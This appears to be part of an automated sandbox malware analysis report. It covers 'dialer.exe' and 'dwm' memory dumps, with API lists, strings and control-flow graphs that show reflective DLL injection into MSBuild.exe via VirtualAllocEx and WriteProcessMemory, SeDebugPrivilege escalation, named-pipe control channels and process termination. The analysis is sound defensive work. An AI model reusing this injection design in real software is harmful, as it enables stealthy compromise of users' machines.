                                                                                • API String ID: 2933794660-0
                                                                                • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction ID: b3e2e8b3ee01e900106f8fb1ff11970b5bded7ad225184f936041eabba14970d
                                                                                • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction Fuzzy Hash: 4F111836711F018AEB008B65E8643E833A4F71D758F441E21FF6D867A8DB79D5988380
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction ID: 882358c39291f2af5a493082e9d1eab477af66771de1d0ea3171835649493e7c
                                                                                • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction Fuzzy Hash: EF71B436200B8186EB2DDF2EA8543EA6794F38DB84F550266FF0953B9DDE36C685C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415177632.000001160C9E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160C9E0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160c9e0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CallTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3163161869-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: eb3fe4af68b8d01bc1b6c7a3ad90ad3afe4d69aaa56d732ad9d0e1b070ac0d9f
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: FF617A33A00B84CAEB28DF65D4803DD7BA0F768B88F054655EF4917B99EB3AD595C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction ID: 0dd3096737f7cf84e0afb6c78436224c8bd63104462fa8f98e8db59649f6874d
                                                                                • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction Fuzzy Hash: EC51C47220478185E77C9E2EA4983EA6B91F38D790F450265FF5A03B9DDA3FC984C740
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction ID: 7ec0ab3bc4456a239118220442b5b89ef32dd75cdd716ed4bea875251d6f3c28
                                                                                • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction Fuzzy Hash: AD41A272619B9086DB248F2AE8543E9A7A0F79C794F404121FF4D87798DB3DC881C740
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction ID: 55f76451f0a00aa76711e93bf972c8125f1d92d3f77d6b161e8a3b47fd2d8d2e
                                                                                • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction Fuzzy Hash: 2C112B36615B8082EB658F29E45439A77E5F78CB94F584260EF8C07758DF3DC995CB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415177632.000001160C9E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160C9E0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160c9e0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: ierarchy Descriptor'$riptor at (
                                                                                • API String ID: 592178966-758928094
                                                                                • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction ID: 3f64ac4d0f423de6435d930bc6e48a03b4d3f4bc5a50e10074d9c9cf33aa7e29
                                                                                • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction Fuzzy Hash: 70E08671640B4494DF098F62E8402D833A0EB6CB64F899122AA5C06355FA38D1EAC300
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415177632.000001160C9E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160C9E0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160c9e0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: Locator'$riptor at (
                                                                                • API String ID: 592178966-4215709766
                                                                                • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction ID: 3d9f1cadf2d574a733be8525cb7cdf29bcd32cd4cbcf8627c331bc1aac329539
                                                                                • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction Fuzzy Hash: 68E08671640B4484DF098F61D8401D87360E76CB54BC99122EA4C06355FA38D1E5C300
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction ID: 1fee924ccb90c0c3256cfe4e1177e9c659f148ef3ba26ee114369a7c0e31a1e3
                                                                                • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction Fuzzy Hash: 60114F35602F9481EB58DB6BA4142E977A1FB8DFD0F184168EF4D5776ADE3AD882C300
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction ID: df6e12ff08372931fb7b06907e266d9e84ad481713e3d1ea27beb58647def250
                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction Fuzzy Hash: 70E03935602B1486EB088B67D82838A36E1EB8DB06F0480249F0907355DF7E98D9CB50

                                                                                Callgraph

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                                                • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                                • API String ID: 4177739653-1130149537
                                                                                • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                                • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                                                • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                                • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740

                                                                                Control-flow Graph

                                                                                control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                                • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                                                • API String ID: 2561231171-3753927220
                                                                                • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                                • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                                                • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                                • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                                • String ID:
                                                                                • API String ID: 4084875642-0
                                                                                • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                                • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                                                • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                                • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                                • String ID: .text$C:\Windows\System32\
                                                                                • API String ID: 2721474350-832442975
                                                                                • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                                • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                                                • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                                • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                                • String ID: M$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2203880229-3489460547
                                                                                • Opcode ID: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                                                                                • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                                                • Opcode Fuzzy Hash: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                                                                                • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700

                                                                                Control-flow Graph

                                                                                control_flow_graph 129 1400021d0-1400021da 130 1400021dd-1400021f0 call 140001b54 129->130 133 1400021f2-1400021fb Sleep 130->133 134 1400021fd-14000220a ConnectNamedPipe 130->134 133->130 135 140002241-140002246 Sleep 134->135 136 14000220c-14000222d ReadFile 134->136 137 14000224c-140002255 DisconnectNamedPipe 135->137 136->137 138 14000222f-140002234 136->138 137->134 138->137 139 140002236-14000223f 138->139 139->137
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                                • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                • API String ID: 2071455217-3440882674
                                                                                • Opcode ID: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                                                                                • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                                                • Opcode Fuzzy Hash: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                                                                                • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                                • String ID:
                                                                                • API String ID: 3197395349-0
                                                                                • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                                • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                                                • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                                • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40

                                                                                Control-flow Graph

                                                                                control_flow_graph 149 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 150 140002b8e-140002ba1 K32EnumProcesses 149->150 151 140002ba3-140002bb2 150->151 152 140002beb-140002bf4 SleepEx 150->152 153 140002bb4-140002bb8 151->153 154 140002bdc-140002be7 151->154 152->150 155 140002bba 153->155 156 140002bcb-140002bce call 140002540 153->156 154->152 157 140002bbe-140002bc3 155->157 160 140002bd2 156->160 158 140002bc5-140002bc9 157->158 159 140002bd6-140002bda 157->159 158->156 158->157 159->153 159->154 160->159
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                                • String ID:
                                                                                • API String ID: 3676546796-0
                                                                                • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                                • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                                                • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                                • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                                                • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                                                  • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                                                  • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                                                  • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                                                  • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                                                  • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                                                  • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                                                  • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                                                  • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                                                  • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                                                • OpenProcess.KERNEL32 ref: 0000000140001859
                                                                                • TerminateProcess.KERNELBASE ref: 000000014000186C
                                                                                • CloseHandle.KERNEL32 ref: 0000000140001875
                                                                                • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                                • String ID:
                                                                                • API String ID: 1323846700-0
                                                                                • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                                • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                                                • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                                • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700

                                                                                Control-flow Graph

                                                                                control_flow_graph 173 1400018ac-1400018d6 OpenProcess 174 140001901-140001912 173->174 175 1400018d8-1400018e8 IsWow64Process 173->175 176 1400018f8-1400018fb CloseHandle 175->176 177 1400018ea-1400018f3 175->177 176->174 177->176
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseHandleOpenWow64
                                                                                • String ID:
                                                                                • API String ID: 10462204-0
                                                                                • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                                • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                                                • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                                • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700

                                                                                Control-flow Graph (graph image not reproduced): basic blocks 140002258-140002263; calls subfunction 14000226c, then ExitProcess
                                                                                APIs
                                                                                  • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                                                  • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                                                  • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                                                  • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                                                  • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                                                  • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                                                  • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                                                  • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                                                  • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                                                  • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
